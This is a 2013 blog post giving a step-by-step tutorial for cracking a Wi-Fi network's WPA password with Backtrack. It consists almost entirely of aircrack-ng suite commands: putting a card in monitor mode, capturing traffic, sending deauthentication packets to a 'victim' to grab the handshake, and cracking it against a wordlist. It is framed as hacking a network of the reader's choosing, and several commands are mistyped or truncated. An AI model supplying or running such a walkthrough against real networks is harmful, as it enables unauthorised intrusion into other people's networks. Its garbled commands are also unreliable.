Monday, 14 January 2013

Cracking wi-fi WPA security using Backtrack

Cracking WPA(with dictionary) Method
1)  To check wireless card is available or not
Cmd-- Iwconfig
2)  To start wireless interface in monitor mod
cmd-- airmon-ng start wlan0

Here your monitor mod is active
3)  Scanning of all the networks
cmd-- airodump-ng mon0
here show all network. Select one network that you want to hacked
4)  Set the channel id of network that you want to hacked
cmd-- iwconfig wlan0 channel 3
cmd-- iwconfig mon0 channel 3
5)  Now we will start the Packet capturing
cmd-- airodump-ng  –c 3 –w abc(any name) - -bssid  80:1F:02:6C:C4  mon0

In that cmd data capture will started and that data will be capture upto 10,000 data
6)  After that send to victim  Deaunthtication Packet and get the Handseak signal
cmd-- aireplay-ng  -0 1(How many time send packet)  -a bssid 80:1F:02:6C:C4  -c  station number  mon0
7)  After show the handseak signal use that cmd for use that packet to check that password in packets
cmd-- aircrack-ng  abc-01.cap –w locatin of dictionary 

Now how to find out location of dictionary
cmd-- locate darkc0de


No comments:

Post a Comment